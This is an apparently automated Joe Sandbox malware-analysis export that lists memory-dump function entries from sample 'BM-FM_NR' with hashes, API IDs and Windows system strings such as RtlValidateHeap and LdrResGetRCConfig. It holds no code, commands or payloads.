                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: RtlValidateHeap
                                                                      • API String ID: 3446177414-1797218451
                                                                      • Opcode ID: 40541f864ab4752e2c43199268112b1d6130cca8e5cd239a63c6ee2a205f0898
                                                                      • Instruction ID: b930c312493bcfd4555f674bf8eaad757b77f5983730eca6a7dfcff7d51bac5f
                                                                      • Opcode Fuzzy Hash: 40541f864ab4752e2c43199268112b1d6130cca8e5cd239a63c6ee2a205f0898
                                                                      • Instruction Fuzzy Hash: 19412479B052A5DFDB06CFA4CC64BADBBB2FF80211F648259D8115B280CB34D901DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@
                                                                      • API String ID: 0-149943524
                                                                      • Opcode ID: 9f336ca53a211b1a86fb0151dd5e6a1a99478366e6805f9335d8c6f37bedcfce
                                                                      • Instruction ID: 4d717eb2ae6a14ca9e60bcf0163800c6f6d5e6af5dfb1987c052c38268dbf97c
                                                                      • Opcode Fuzzy Hash: 9f336ca53a211b1a86fb0151dd5e6a1a99478366e6805f9335d8c6f37bedcfce
                                                                      • Instruction Fuzzy Hash: 16329BB49283218BD7248F16CC90B2EB7E1EF98744F50492EF9958F290E736C954DB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 4b3f272c2628a07269fb7cc662aec0a9004eb70ca0b5f812dd5568db07789b18
                                                                      • Instruction ID: 00b9c5b691fc1f46265009f5e9ca8fcfc869208423b1b0893c6a2ace852bcb80
                                                                      • Opcode Fuzzy Hash: 4b3f272c2628a07269fb7cc662aec0a9004eb70ca0b5f812dd5568db07789b18
                                                                      • Instruction Fuzzy Hash: 9D31BE31611B22BFE746AF24CE80E8AFB65FF44758F145125E9018BA50DB71E821DFD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: cecbba3b507fb84b23f9a2e78b416f6417c2d8c355cca41736f2e71b7d1b0172
                                                                      • Instruction ID: 5efcfdb6edee152059d543def36fe7f214d480dff1ddec10802249613e467b7d
                                                                      • Opcode Fuzzy Hash: cecbba3b507fb84b23f9a2e78b416f6417c2d8c355cca41736f2e71b7d1b0172
                                                                      • Instruction Fuzzy Hash: FE112771F00326ABEB04AF59C994A5EF7B9EB48268F200079EA09E7300CA749D00CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                      • Instruction ID: 6678bc9e2f596199bc14a97f4f44a47661faf5fd77974fb85f19389873e7be94
                                                                      • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                      • Instruction Fuzzy Hash: 32C1E1716083919BE724CF26CC40B6BBBE5EF84758F004A2DF995CA290D7B5D905CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$AddD
                                                                      • API String ID: 0-2525844869
                                                                      • Opcode ID: 6d997a7f4c5a3451735195315429e48e9be7e9be5a1483bb780549198ed37336
                                                                      • Instruction ID: f14d8618f25a83f63bb6e3dcf8aaad64e3694f03a8a34760532bbf1472d38a7c
                                                                      • Opcode Fuzzy Hash: 6d997a7f4c5a3451735195315429e48e9be7e9be5a1483bb780549198ed37336
                                                                      • Instruction Fuzzy Hash: 6BA16CB6504344AFD714CF29C845FABBBE9FB84748F504A2EF99486150E770E909CF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 36BBB5C4
                                                                      • RedirectedKey, xrefs: 36BBB60E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                      • API String ID: 0-1388552009
                                                                      • Opcode ID: ee8433523fb598d40e5d8a0f3003999067ce5d4ea8c77b5f055c1f289a03e614
                                                                      • Instruction ID: a6a67bcc8e26edb795d78de073cc15c202387b0f3020217147d41802c1e2abea
                                                                      • Opcode Fuzzy Hash: ee8433523fb598d40e5d8a0f3003999067ce5d4ea8c77b5f055c1f289a03e614
                                                                      • Instruction Fuzzy Hash: 046116B5C00228EFDF11DF95C988ADEBFB9FB08705F50405AE905A7250DBB49A46CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$$
                                                                      • API String ID: 3446177414-233714265
                                                                      • Opcode ID: 77155f121bd6f8928a5f9f5d8216b685595a1148379c280b185026f31f4114c4
                                                                      • Instruction ID: 9f4e7abb6ed90756282e95919bd41250baf9860700a099d35dfcbbcff9fb219f
                                                                      • Opcode Fuzzy Hash: 77155f121bd6f8928a5f9f5d8216b685595a1148379c280b185026f31f4114c4
                                                                      • Instruction Fuzzy Hash: 3061CC76E10749CBEB20DFA4CE80B9DBBB1FB04308F104469E9046F691DB76A941CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                      • API String ID: 0-118005554
                                                                      • Opcode ID: 84f219a385b70212c20330b9d2c987e71f1ce5ce90b63561d6d25ae6f5d5b179
                                                                      • Instruction ID: 801a6c93fd6575a7a35bdc6a3aa1fa13daa7ea1da8363ae87f4806edd564be47
                                                                      • Opcode Fuzzy Hash: 84f219a385b70212c20330b9d2c987e71f1ce5ce90b63561d6d25ae6f5d5b179
                                                                      • Instruction Fuzzy Hash: 3F31CB756187619BE311CF6ADC80B2AB7E8EF85754F010869FC648B390EB35D905CBA3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Local\$@
                                                                      • API String ID: 0-380025441
                                                                      • Opcode ID: be34c57075b2dada4aeacbb274e59af5f3ba6b645662474f46cdd64791f446e7
                                                                      • Instruction ID: 8d47fc55d14e89c5f07abbb61417e5b15910cdcc7b495fd0dd05d285c4612281
                                                                      • Opcode Fuzzy Hash: be34c57075b2dada4aeacbb274e59af5f3ba6b645662474f46cdd64791f446e7
                                                                      • Instruction Fuzzy Hash: 01319EB1509311AFE310DF28C980A5BBBE8EB85694F10092EF99483250E635DD08CFE3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36B5289F
                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 36B5289A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                      • API String ID: 0-2653619699
                                                                      • Opcode ID: fa7e6b305fdb19047838270d151b76027d9ea67af108a1db9d2aee364567224c
                                                                      • Instruction ID: aa4d4a098a757670ab51995ba01169deb6c3b14f6409b6fdb31715ebf49ca012
                                                                      • Opcode Fuzzy Hash: fa7e6b305fdb19047838270d151b76027d9ea67af108a1db9d2aee364567224c
                                                                      • Instruction Fuzzy Hash: E31129B6F01224FBF7158B89CD41F9B76A8DB84754F118029BA04DB244EA75DD008FB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: c3ce879e3857bfaa9f63f541abfaaea3b6927eb2c1b38dae30c859b75f8f61c9
                                                                      • Instruction ID: 6454717445b11a8d1657d471673f6a54a73494b404c9075011fdc146b85519f7
                                                                      • Opcode Fuzzy Hash: c3ce879e3857bfaa9f63f541abfaaea3b6927eb2c1b38dae30c859b75f8f61c9
                                                                      • Instruction Fuzzy Hash: 37B100B5A093908FD354CF28C980A5AFBF1BB88304F14496EF8999B352D771E845CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f3cb9b054775955dd165055b27a91548a4d0c59b1f142279a54e8a79917dbabf
                                                                      • Instruction ID: a9813558be0daa8b289608031e1c8a3d1962c038573cd018be5da9fb03997c9b
                                                                      • Opcode Fuzzy Hash: f3cb9b054775955dd165055b27a91548a4d0c59b1f142279a54e8a79917dbabf
                                                                      • Instruction Fuzzy Hash: 54815D71A00319AEDB21DFA6CC81EAFBBF8EF49714F100629E555E7190DA70E900CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f48fd0326de32981cb7624a7ef0edc768bdd170bdc5f44ae184b4cad29fa14e7
                                                                      • Instruction ID: 06c7bae095a6fd857703633547fd9d9f92c9e3c68a29fd5df102e430ae0cceec
                                                                      • Opcode Fuzzy Hash: f48fd0326de32981cb7624a7ef0edc768bdd170bdc5f44ae184b4cad29fa14e7
                                                                      • Instruction Fuzzy Hash: 61617075E00616AFDB08DF68C984A9DFBB5FF48345F25816AD819AB300DB34A941CFD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: 079f0cf54416acd93b671d58c25db42057273610331c8e24304fd35be896e6d6
                                                                      • Instruction ID: 7c56c58d49704965424d410c8017a9e82e229c5f47f391c7ee97e767a5124e4f
                                                                      • Opcode Fuzzy Hash: 079f0cf54416acd93b671d58c25db42057273610331c8e24304fd35be896e6d6
                                                                      • Instruction Fuzzy Hash: 92E1B379D002698FDB10CFA9C8806EDBBF1FF44740FA0816AE855AB291D7749C86EF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 7f4a930e638962ee9d3240bc21d11b19a719788cacf80cda24bc9a7c635f104f
                                                                      • Instruction ID: 87c2ffdfd050a8ee0f09cef38f1def17c6524b50a59b53b18567b705cbe68b5f
                                                                      • Opcode Fuzzy Hash: 7f4a930e638962ee9d3240bc21d11b19a719788cacf80cda24bc9a7c635f104f
                                                                      • Instruction Fuzzy Hash: 7F3141F2A00204AFC311CF14C8A0A5A77F9EF44764F214269ED048F291CB32ED02CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 2a4457721237cac82d3b922e8dd240190c8a4f4d85d7e5a4e9e6d72676a5add7
                                                                      • Instruction ID: 15996d111a806427ac5dce1c686843c523a959fb2d5c6518f5e0a6144f84552e
                                                                      • Opcode Fuzzy Hash: 2a4457721237cac82d3b922e8dd240190c8a4f4d85d7e5a4e9e6d72676a5add7
                                                                      • Instruction Fuzzy Hash: FB31AF39625A25FFE7469F24DE80A59BBA5FF84244F50A055EC018BA50CB32E831DFC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 819cda20d4c4b2334fc2492ca7bbb02ce080cb7b12cd826bc1338cac8ff8f950
                                                                      • Instruction ID: 8786f9071ad786c57e4232af431a848adb7c15abe625c3d582b039738b0caecf
                                                                      • Opcode Fuzzy Hash: 819cda20d4c4b2334fc2492ca7bbb02ce080cb7b12cd826bc1338cac8ff8f950
                                                                      • Instruction Fuzzy Hash: C0212235A15600AFD321AF15CE40B1ABBA1EF80B10F522459EC450F341D675EC48CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 504c30f6df9e152a1fbff7132d6c078ca80e0f22512aad722b82c2a50ffeb9b3
                                                                      • Instruction ID: c74180f80dab0371db8628d44efbafa488ac2ba88e9b88b570aa1fe9a548f95b
                                                                      • Opcode Fuzzy Hash: 504c30f6df9e152a1fbff7132d6c078ca80e0f22512aad722b82c2a50ffeb9b3
                                                                      • Instruction Fuzzy Hash: 7BF0FA32204700ABD3319F09CC14F8ABBFDEF80B00F14055CA94A97491C6A1E909CAA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0c8c5d2dd9bcbc6b982b0403e431ea5b2452eef2e5277cc6e8db87880ae4246
                                                                      • Instruction ID: e357885595b96f0132998a90b614a6d84c1be7547bf6d90cc7ec129ebbeb27c7
                                                                      • Opcode Fuzzy Hash: e0c8c5d2dd9bcbc6b982b0403e431ea5b2452eef2e5277cc6e8db87880ae4246
                                                                      • Instruction Fuzzy Hash: 53E0E572B10214ABEB00DB58D850F8A73FCEB8879CF1400A8F50AD7140D660DD01DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                      • Instruction ID: 16ea4fca045f2a0c1dae9040c72049799b517a08ab30056bfb6878f64af98741
                                                                      • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                      • Instruction Fuzzy Hash: 5B6167B5D04329AFEB11DFA9CC40BDEBBB4EF84754F10012AE854A7250DB748A05DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                      • Instruction ID: aad0db2e970d9cfc1743f9778842b24270d190b31290fe3e9eff3b53ad2a62a5
                                                                      • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                      • Instruction Fuzzy Hash: 75519AB2514705AFE7118E26CD40F6BB7EDFB84758F404929BA849B290DBB1DD04CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: verifier.dll
                                                                      • API String ID: 0-3265496382
                                                                      • Opcode ID: 919b17143b01eaed697f0baad7b257235da0f1eeec584b255670fcb2341b96d7
                                                                      • Instruction ID: ad388176c3026518d13b434ba7c6c77d54c217bcf6e471da7abe2fd097ab08ce
                                                                      • Opcode Fuzzy Hash: 919b17143b01eaed697f0baad7b257235da0f1eeec584b255670fcb2341b96d7
                                                                      • Instruction Fuzzy Hash: C031C7B6A103139FE7249F1E9860B26B7E5EB58359F90903AE709DF381E6718D81CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                      • Instruction ID: c1bf40bbde5f32e68c3320594eab01000eb66968fc20ebdc7d8e1e902a5178c4
                                                                      • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                      • Instruction Fuzzy Hash: FE41CD75A0062AEBEB10CF89C894FAEBBB4EF40745F11446AE945AB240DB349941CFE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Flst
